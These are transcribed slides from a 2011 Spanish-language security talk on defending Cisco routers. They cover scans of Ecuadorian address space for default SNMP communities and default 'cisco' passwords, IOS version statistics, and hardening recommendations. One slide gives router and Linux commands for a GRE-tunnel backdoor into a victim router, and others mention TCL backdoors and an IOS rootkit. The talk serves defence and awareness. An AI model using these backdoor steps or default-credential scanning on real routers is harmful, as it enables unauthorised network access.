defendiendo nuestro router cisco
DESCRIPTION
Diapositivas de la charla "Defendiendo Nuestro Router CISCO" en el evento E-Security Conferences, en Guayaquil, Ecuador. Seguime en Twitter: @KFSTRANSCRIPT
![Page 1: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/1.jpg)
DEFENDIENDONUESTRO ROUTERCISCO
e-security conferencesGuayaquil, Ecuador - 2011
by Leonardo Pigñer (@KFS)
![Page 2: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/2.jpg)
Leonardo Pigñer Director de Servicios Profesionales
@base4sec
@KFS
@ekoparty
KUNGFOOSION.com
![Page 3: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/3.jpg)
1. ¿Por Qué Cisco?
2. Tipos de Ataques
3. Puertas Traseras
4. Recomendaciones
Agenda
![Page 4: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/4.jpg)
Source: http://newsroom.cisco.com/documents/10157/1204766/Public_Corporate_Overview_FY11_Q3.pdf
¿Por Qué Cisco?
![Page 5: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/5.jpg)
SECURITY
¿Por Qué Hackear Routers?
![Page 6: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/6.jpg)
¿Por Qué HackearRouters?
“El Administrador de Red”
![Page 7: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/7.jpg)
ActualizacionesComplejas...
![Page 8: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/8.jpg)
- Licencias ($$$)- Hardware Descontinuado
![Page 9: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/9.jpg)
¿Cómo Conseguir “Estadísticas”
de ECUADOR?
![Page 10: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/10.jpg)
Registro de Direcciones de InternetPara América Latina y Caribe
wget ftp://ftp.lacnic.net/pub/stats/lacnic/delegated-lacnic-latest
lacnic|CO|ipv4|186.1.248.0|2048|20110822|allocatedlacnic|BO|ipv4|186.2.0.0|16384|20090105|allocatedlacnic|PY|ipv4|186.2.192.0|8192|20100827|allocatedlacnic|EC|ipv4|186.3.64.0|16384|20091216|allocatedlacnic|EC|ipv4|186.3.128.0|32768|20100427|allocatedlacnic|CR|ipv4|186.4.0.0|16384|20091118|allocatedlacnic|AR|ipv4|186.4.64.0|16384|20100826|allocated
perl lacnic_parser.pl
![Page 11: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/11.jpg)
157.100.0.0/16186.0.144.0/21186.3.0.0/18186.3.64.0/18186.3.128.0/17186.4.128.0/17186.5.0.0/17186.42.0.0/17186.42.128.0/17186.43.128.0/18186.46.0.0/17186.46.128.0/17186.47.0.0/16186.65.0.0/18186.66.0.0/17186.66.128.0/17186.68.0.0/15186.70.0.0/15186.101.0.0/16186.178.0.0/16190.8.180.0/22190.9.160.0/20190.9.176.0/20190.10.128.0/18190.10.192.0/18190.11.0.0/19190.12.0.0/19
192.207.40.0/24192.207.41.0/24192.207.42.0/24192.207.65.0/24192.207.66.0/24192.207.67.0/24192.207.68.0/24192.207.244.0/24200.0.28.0/22200.0.63.0/24200.0.73.0/24200.0.74.0/24200.0.75.0/24200.0.76.0/24200.0.77.0/24200.0.78.0/24200.1.6.0/24200.1.161.0/24200.1.172.0/24200.7.83.0/24200.7.192.0/19200.7.224.0/19200.9.96.0/24200.9.176.0/24200.9.248.0/24200.10.147.0/24200.10.148.0/22
190.154.0.0/17190.154.128.0/17190.155.0.0/17190.155.128.0/17190.214.0.0/17190.214.128.0/17192.188.44.0/24192.188.45.0/24192.188.46.0/24192.188.47.0/24192.188.48.0/24192.188.49.0/24192.188.50.0/24192.188.51.0/24192.188.52.0/24192.188.53.0/24192.188.54.0/24192.188.55.0/24192.188.56.0/24192.188.57.0/24192.188.58.0/24192.188.59.0/24192.188.60.0/24192.188.194.0/24192.188.195.0/24192.188.196.0/24192.188.197.0/24
190.12.32.0/19190.15.128.0/20190.52.64.0/20190.52.192.0/20190.57.128.0/18190.94.128.0/19190.95.128.0/19190.95.160.0/19190.95.192.0/19190.95.224.0/19190.96.96.0/21190.99.72.0/21190.107.64.0/20190.107.232.0/21190.108.64.0/21190.110.192.0/19190.111.64.0/20190.120.64.0/20190.120.80.0/20190.123.0.0/20190.123.48.0/20190.130.128.0/17190.131.0.0/18190.131.64.0/18190.131.128.0/18190.152.0.0/17190.152.128.0/17
200.105.224.0/20200.105.240.0/20200.107.0.0/19200.107.32.0/19200.107.248.0/21200.110.64.0/20200.110.80.0/20200.110.112.0/20200.110.232.0/21200.115.32.0/20200.124.224.0/20200.124.240.0/20200.125.128.0/20200.125.144.0/20200.125.192.0/19200.125.224.0/19200.126.0.0/19201.217.64.0/19201.217.96.0/19201.218.0.0/19201.218.32.0/19201.219.0.0/19201.219.32.0/19201.238.128.0/19201.238.160.0/20201.238.176.0/20
200.12.169.0/24200.12.196.0/22200.14.34.0/24200.14.83.0/24200.16.94.0/24200.24.192.0/19200.25.128.0/19200.25.160.0/19200.25.192.0/20200.25.208.0/20200.29.240.0/21200.49.240.0/21200.50.232.0/21200.55.224.0/20200.55.248.0/21200.63.192.0/19200.63.224.0/20200.63.240.0/20200.69.160.0/20200.69.176.0/20200.73.200.0/21200.85.80.0/21200.90.152.0/21200.93.192.0/19200.93.224.0/20200.93.248.0/21200.105.112.0/21
1.698.560
![Page 12: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/12.jpg)
Errar es Humano,¿Perdonar es Divino?
- SNMP por Default
- Contraseñas Débiles
- Vulnerabilidades
- Protocolos
![Page 13: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/13.jpg)
Simple NetworkManagement ProtocolSNMP
![Page 14: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/14.jpg)
Simple NetworkManagement ProtocolSNMP
• Versiones: SNMPv1 - SNMPv2 - SNMPv3
• MIB: Base de Información de Administración
• Comunidad = Contraseña
- “public” = comunidad de lectura
- “private” = comunidad de escritura
![Page 15: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/15.jpg)
![Page 16: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/16.jpg)
DEMO Tripper.plby @KFS
![Page 17: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/17.jpg)
SNMP Scanning
- Public- Private
![Page 18: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/18.jpg)
100%
0%
Total = 1.695.560 SNMP “default” = 5.925
SNMP Default
- Public = 5.465- Private = 460
![Page 19: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/19.jpg)
80%
20%
OTROS = 4.713 CISCO = 1.212
Dispositivos Cisco
![Page 20: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/20.jpg)
0
175
350
525
700
11.2 12.0 12.1 12.2 12.3 12.4 15.0 15.1
11.2(16)P = 112.0(11) = 112.0(28b) = 212.0(5.4)WC(1) = 212.0(7) = 212.0(7)T = 512.1(27b) = 112.1(5)T10 = 212.1(5)T8 = 112.1(8c) = 112.2(15)T = 112.2(15)T17 = 112.2(17) = 112.2(1a) = 412.2(25)SEA = 112.2(25)SEB4 = 112.2(25)SEE2 = 2912.2(25)SEE3 = 112.2(33)SB5 = 25412.2(33)SRA = 7112.2(33)SRC3 = 14412.2(33)SRD3 = 13512.2(4)YH = 212.2(55)SE = 112.2(6a) = 112.2(8)YN = 112.3(11)T = 212.3(11)T10 = 112.3(11)T2 = 612.3(11)T3 = 112.3(12c) = 112.3(16) = 212.3(22) = 112.3(23) = 312.3(26) = 1
12.3(3a) = 212.3(3g) = 112.3(8)YG4 = 112.3(8)YI3 = 1212.4(10) = 112.4(10b) = 412.4(11)T = 412.4(11)XW7 = 112.4(12a) = 312.4(15)T4 = 4612.4(15)T5 = 7912.4(15)T7 = 712.4(15)T9 = 1112.4(18) = 312.4(19) = 16812.4(19b) = 812.4(1a) = 312.4(1c) = 1112.4(20)T2 = 412.4(20)T5 = 112.4(24)T = 5712.4(24)T1 = 712.4(24)T2 = 212.4(24)T4 = 112.4(3g) = 312.4(3h) = 412.4(3i) = 312.4(4)T8 = 812.4(6)T11 = 912.4(6)T7 = 115.0(1)M2 = 4815.0(1)M3 = 515.0(1)M4 = 415.0(1)M5 = 115.0(1)M7 = 415.1(2)T4 = 1
Versiones de IOS
![Page 21: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/21.jpg)
12.2• Fin de Venta• Fin de Mantenimiento
![Page 22: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/22.jpg)
TELNET
Default Password:
“cisco”
![Page 23: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/23.jpg)
99%
1%
CISCO SNMP = 1.212 TELNET “cisco” = 29
TELNET con “cisco”
![Page 24: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/24.jpg)
69%
31%
TELNET “cisco” = 29 ENABLE “cisco” = 13
ENABLE con “cisco”
![Page 25: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/25.jpg)
DEMO getCISCOby @KFS
![Page 26: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/26.jpg)
¿vulnerabilidades?
![Page 27: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/27.jpg)
¿vulnerabilidades?
getIOS.pl
![Page 28: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/28.jpg)
ataque a protocolosIRPAS “Internetwork Routing Protocol Attack Suite”
Protocolos soportados:• CDP• IRDP• IGRP• EIGRP (discovery)• RIPv1 (discovery)• RIPv2 (discovery)• OSPF (discovery)• HSRP• DHCP DORA• ICMP Redirects
http://www.phenoelit-us.org/
![Page 29: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/29.jpg)
http://www.networkworld.com/news/2011/080411-blackhat-ospf-vulnerability.html
![Page 30: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/30.jpg)
![Page 31: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/31.jpg)
Backdoor con Túnel GRE
![Page 32: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/32.jpg)
interface Tunnel2ip address 2.2.2.1 255.255.255.0tunnel source [Publica_Linux]tunnel destination [Publica_Cisco]tunnel mode gre ip
Cisco
modprobe ip_greip tunnel add a_VICTIMA_2 mode gre remote [Publica_Cisco] local [Publica_Linux] ttl 255ip link set a_VICTIMA_2 upip addr add 2.2.2.2 dev a_VICTIMA_2ip route add 2.2.2.0/24 dev a_VICTIMA_2
Linux
DEMO!
![Page 33: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/33.jpg)
DIK “DA IOS ROOTKIT”Sebastian 'topo' Muñiz
![Page 34: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/34.jpg)
http://cir.recurity.com/cir/default.aspx
![Page 35: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/35.jpg)
TCL Backdoor
• Necesita “ENABLE”
• IOS 12.2(25) S, 12.3(2) T
• Funciona en otras versiones...
• “tclsh”
DEMO!
![Page 36: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/36.jpg)
Recomendaciones
@base4sec
• Actualizar el Software
• Deshabilitar Servicios No Usados
• Bloquear el Tráfico
• Segmentar la Red de Administración
• Correlacionar Logs
![Page 37: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/37.jpg)
¿preguntas?
@base4sec
![Page 38: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/38.jpg)
GRACIAS!!
@KFS KUNGFOOSION.com